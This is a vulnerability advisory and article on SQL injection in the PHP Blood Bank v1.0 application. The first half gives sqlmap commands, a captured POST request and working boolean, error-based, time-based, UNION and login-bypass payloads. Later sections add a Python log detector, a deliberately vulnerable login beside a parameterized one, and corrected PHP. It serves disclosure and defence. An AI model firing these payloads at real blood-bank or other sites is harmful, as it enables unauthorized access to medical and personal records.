Blood Bank v1.0 - Multiple SQL Injection
# Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018
-------------------------------------------------------------------------------
1. Description:
The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
Vulnerable File: /hospitalLogin.php
Parameter Names: hemail, hpassword
2. Proof of Concept:
----------------------
Execute sqlmap using either the 'hemail' or 'hpassword' parameter to retrieve the current database:
sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
Parameter: hemail (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
-------------------------------------------------------------------------------
1. Description:
The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
Vulnerable File: /receiverLogin.php
Parameter Names: remail, rpassword
2. Proof of Concept:
----------------------
Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:
sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db
SQLMap Response:
----------------------
---
Parameter: remail (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
---
---
Parameter: rpassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
---
-------------------------------------------------------------------------------
# Description:
The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
Vulnerable File: /receiverReg.php
Parameter Name: remail
# Proof of Concept:
----------------------
1. Save the POST request of receiverReg.php to a request.txt file
---
POST /bloodbank/file/receiverReg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
Content-Length: 877
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/register.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rname"
test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rbg"
A+
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rcity"
test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rphone"
05555555555
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="remail"
test@test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rpassword"
test123
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rregister"
Register
-----------------------------2653697510272605730288393868--
---
2. Execute sqlmap using 'remail' parameter to retrieve the current database:
sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
-------------------------------------------------------------------------------
Blood Bank v1.0: Multiple SQL Injection Vulnerabilities – A Deep Dive into CVE-2023-46014, CVE-2023-46017, and CVE-2023-46018
Security vulnerabilities in web applications are not just theoretical risks—they can lead to real-world data breaches, unauthorized access, and systemic compromise. One such example is Blood Bank v1.0, a PHP-based blood donation management system available on code-projects.org. Despite its seemingly benign purpose, this application harbors multiple critical SQL injection flaws that have been formally recognized by the CVE database as CVE-2023-46014, CVE-2023-46017, and CVE-2023-46018. These vulnerabilities affect two critical login endpoints: /hospitalLogin.php and /receiverLogin.php, exposing sensitive data and undermining authentication mechanisms.
Understanding the Vulnerability: Input Sanitization Failure
SQL injection occurs when user input is directly embedded into SQL queries without proper validation or sanitization. In Blood Bank v1.0, both hemail and hpassword in hospitalLogin.php, and remail and rpassword in receiverLogin.php, are used to construct database queries without escaping special characters or validating input format.
Attackers can exploit this by injecting malicious SQL payloads through these parameters. For instance, a simple payload like ' OR 1=1 -- can bypass authentication checks entirely, allowing unauthorized access to the database.
hemail=test@test' OR 1=1 -- &hpassword=test&hlogin=Login
This payload, when sent via POST request, manipulates the SQL query logic to always evaluate as true, effectively granting access to the hospital login system without valid credentials.
Proof of Concept: SQLMap Demonstrates Exploitability
Security researcher Ersin Erenler confirmed the presence of these vulnerabilities using sqlmap, a widely used automated tool for detecting and exploiting SQL injection flaws. The following proof-of-concept demonstrates how sqlmap identifies multiple attack vectors:
1. Boolean-Based Blind Injection
hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
This payload uses a boolean condition to infer database behavior. If the response differs based on whether the condition is true or false, sqlmap can determine the presence of SQL injection. This method is effective in environments where direct output is not visible.
2. Error-Based Injection (FLOOR)
hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
When MySQL encounters an error during query execution (here a duplicate GROUP BY key produced by the non-deterministic FLOOR(RAND(0)*2) expression), it returns an error message that echoes the injected string. This error output reveals information about the database structure, such as the current database name, which can be extracted via automated tools like sqlmap.
3. Time-Based Blind Injection
hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
This payload triggers a delay in the database response using SLEEP(5). If the server takes longer to respond, the attacker knows the injection was successful. This method is particularly useful when no error or boolean output is available.
4. UNION Query Injection
hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
By using UNION ALL, attackers can append rows of their own to the original query results. The hexadecimal literals passed to CONCAT are marker strings that MySQL decodes to text, so the injected column can be located in the page output and its value read back. This method allows extraction of data such as table names, user credentials, or even sensitive medical records.
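Detection from the defender's side: the Python script below is an added example, not part of the advisory or the article, that runs signature checks for the four sqlmap technique families listed above (plus the `' OR 1=1` tautology from the earlier section) over constructed request-log lines. The log format (`<client> <method> <path> <urlencoded body>`), the client addresses and the helper names are assumptions; the payload strings are the ones sqlmap printed in the advisory, URL-encoded the way a client would send them.

```python
import re
from urllib.parse import parse_qs, urlencode

# Regexes for the injection families in the sqlmap output above. They are kept
# narrow so that a single hit is a strong signal; broaden them per deployment.
SIGNATURES = {
    "tautology": re.compile(r"'\s*OR\s+\d+\s*=\s*\d+", re.I),
    "boolean-blind": re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA\.", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}


def classify(value: str) -> list:
    """Return the signature names that match one URL-decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_line(line: str) -> list:
    """Parse one constructed log line '<client> <method> <path> <urlencoded body>'
    and return (script, parameter, [families]) for every parameter carrying a payload."""
    client, method, path, body = line.split(" ", 3)
    script = path.rsplit("/", 1)[-1]
    hits = []
    # parse_qs undoes percent-encoding and '+', so the regexes see the raw payload
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            families = classify(value)
            if families:
                hits.append((script, param, families))
    return hits


def summarize(lines) -> dict:
    """Aggregate the families seen per (script, parameter) across a batch of lines."""
    seen = {}
    for line in lines:
        for script, param, families in scan_line(line):
            seen.setdefault((script, param), set()).update(families)
    return {key: sorted(fams) for key, fams in seen.items()}


def _body(**fields) -> str:
    # Encode a form body the way a browser or sqlmap would submit it
    return urlencode(fields)


# Constructed sample log lines (not from any real server). Lines 3 to 6 carry the
# hemail payloads from the advisory; line 7 carries the rpassword time-based one.
SAMPLE_LOG = [
    "10.0.0.5 POST /bloodbank/file/hospitalLogin.php " + _body(hemail="test@test", hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/hospitalLogin.php " + _body(hemail="test@test' OR 1=1 -- ", hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/hospitalLogin.php " + _body(
        hemail="test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -",
        hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/hospitalLogin.php " + _body(
        hemail="test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),"
               "0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu",
        hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/hospitalLogin.php " + _body(
        hemail="test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb", hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/hospitalLogin.php " + _body(
        hemail="test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -",
        hpassword="test", hlogin="Login"),
    "10.0.0.9 POST /bloodbank/file/receiverLogin.php " + _body(
        remail="test@test", rpassword="test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy", rlogin="Login"),
]

if __name__ == "__main__":
    for key, families in sorted(summarize(SAMPLE_LOG).items()):
        print(key, families)
```

Only the four login parameters named in the advisory show up in the summary; the benign first line produces no hit. In production the same `classify` check belongs on the decoded form values at the application or WAF layer, with the (script, parameter, family) tuple as the alert key.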
Impact and Risk Assessment
| Attack Vector | Exploited Parameter | Severity | Potential Outcome |
|---|---|---|---|
| Authentication Bypass | hemail, hpassword | High | Unrestricted access to hospital admin system |
| Database Information Leak | remail, rpassword | High | Reveal database schema, user data, blood donor records |
| Remote Code Execution (via SQL) | Both | Medium | With advanced payloads, possible execution of OS commands via MySQL |
Given the sensitive nature of blood bank data—personal identifiers, medical history, donor records—the risk of exposure is extremely high. An attacker could not only access user accounts but also manipulate donation records, falsify donor eligibility, or even delete critical data.
Best Practices for Prevention
While this vulnerability is exploitable, it is entirely preventable with proper security practices. The following measures should be implemented:
- Use Prepared Statements (Parameterized Queries): Instead of concatenating user input into SQL, use mysqli_prepare() or PDO to bind parameters securely.
- Input Validation and Sanitization: Ensure email fields follow standard formats (e.g., ^[\w.-]+@[\w.-]+\.\w+$) and reject malformed input.
- Rate Limiting and Logging: Monitor login attempts and block repeated failed attempts to prevent brute-force or injection attacks.
- Use Secure Authentication Mechanisms: Implement bcrypt hashing for passwords and enforce strong password policies.
- Regular Security Audits: Conduct penetration testing using tools like sqlmap, OWASP ZAP, or Burp Suite to detect vulnerabilities early.
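To make the injection mechanics described earlier and the first two recommendations concrete, here is an added example (mine, not code from the project or the article) that models the login in Python against an in-memory SQLite database: the vulnerable concatenated query is shown beside the parameterized one, with the email regex above and a salted-hash password check. The table and column names, the sample credentials, and the PBKDF2 routine standing in for bcrypt (so the script needs no third-party package) are assumptions.

```python
import hashlib
import hmac
import os
import re
import sqlite3

# Email format from the prevention list; malformed input is rejected before any query runs.
EMAIL_RE = re.compile(r"^[\w.-]+@[\w.-]+\.\w+$")

# The authentication-bypass string discussed in the article.
BYPASS_EMAIL = "test@test' OR 1=1 -- "

# Assumption: PBKDF2 stands in for bcrypt here. In PHP use password_hash()/password_verify().
PBKDF2_ROUNDS = 100_000


def hash_password(password: str) -> str:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL database; table and column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    # hospitals_plain mirrors the original query shape (password compared inside SQL);
    # hospitals stores only a salted hash, as the prevention list recommends.
    conn.execute("CREATE TABLE hospitals_plain (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("CREATE TABLE hospitals (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO hospitals_plain (email, password) VALUES (?, ?)",
                 ("city@hospital.example", "correct horse"))
    conn.execute("INSERT INTO hospitals (email, password_hash) VALUES (?, ?)",
                 ("city@hospital.example", hash_password("correct horse")))
    return conn


def vulnerable_login(conn, email: str, password: str) -> bool:
    """The defect in hospitalLogin.php / receiverLogin.php: user input concatenated into SQL.
    With BYPASS_EMAIL the quote closes the literal, OR 1=1 matches every row and the
    comment marker discards the password check."""
    sql = f"SELECT id FROM hospitals_plain WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def hardened_login(conn, email: str, password: str, validate: bool = True) -> bool:
    """Parameterized query plus (optional) format validation and hash comparison."""
    if validate and not EMAIL_RE.match(email):
        return False
    # '?' binds the value as data; a quote inside it can never terminate the string literal.
    row = conn.execute("SELECT password_hash FROM hospitals WHERE email = ?", (email,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload :", vulnerable_login(db, BYPASS_EMAIL, "anything"))               # True
    print("hardened, bypass payload   :", hardened_login(db, BYPASS_EMAIL, "anything"))                 # False
    print("hardened, no regex, bypass :", hardened_login(db, BYPASS_EMAIL, "anything", validate=False))  # False
    print("hardened, valid credentials:", hardened_login(db, "city@hospital.example", "correct horse"))  # True
```

The `validate=False` call shows that parameter binding alone already defeats the payload; the regex is a second, independent layer that also keeps junk out of the table, and the hash comparison means a leaked database no longer yields usable credentials.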
Corrected Code Example (Improved Hospital Login)
```php
<?php
// The listing lost its opening lines in extraction; everything before the
// connect_error check is reconstructed here. Database credentials are placeholders.
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    // Validate the email format before it reaches the database
    $email    = filter_var($_POST["hemail"] ?? "", FILTER_VALIDATE_EMAIL);
    $password = $_POST["hpassword"] ?? "";
    if ($email === false) {
        die("Invalid email");
    }
    $conn = new mysqli("localhost", "<db-user>", "<db-password>", "<db-name>");
    if ($conn->connect_error) {
        die("Connection failed");
    }
    // Use prepared statement: input is bound as data, never concatenated into SQL
    $stmt = $conn->prepare("SELECT id, password FROM hospitals WHERE email = ?");
    $stmt->bind_param("s", $email);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result->fetch_assoc();
    // Compare against a bcrypt hash stored with password_hash(), not a plaintext column
    if ($row !== null && password_verify($password, $row["password"])) {
        echo "Login successful";
    } else {
        echo "Invalid credentials";
    }
    $stmt->close();
    $conn->close();
}
?>
```
This corrected code uses prepared statements to prevent SQL injection, validates email input, and securely handles database interactions. It eliminates the risk of direct injection and ensures that user input cannot manipulate SQL queries.
Conclusion: Lessons from Blood Bank v1.0
Blood Bank v1.0 serves as a stark reminder that even open-source, educational projects can harbor serious security flaws. The CVEs assigned to this application underscore the importance of security awareness in software development. Developers must never assume that a project is "safe" simply because it is publicly available or intended for learning.
By understanding the mechanics of SQL injection—how payloads like OR 1=1 or UNION SELECT manipulate query logic—and by applying modern defensive techniques, we can protect critical systems from exploitation. The real-world consequences of such vulnerabilities—especially in healthcare applications—can be devastating. Prevention is not optional; it is essential.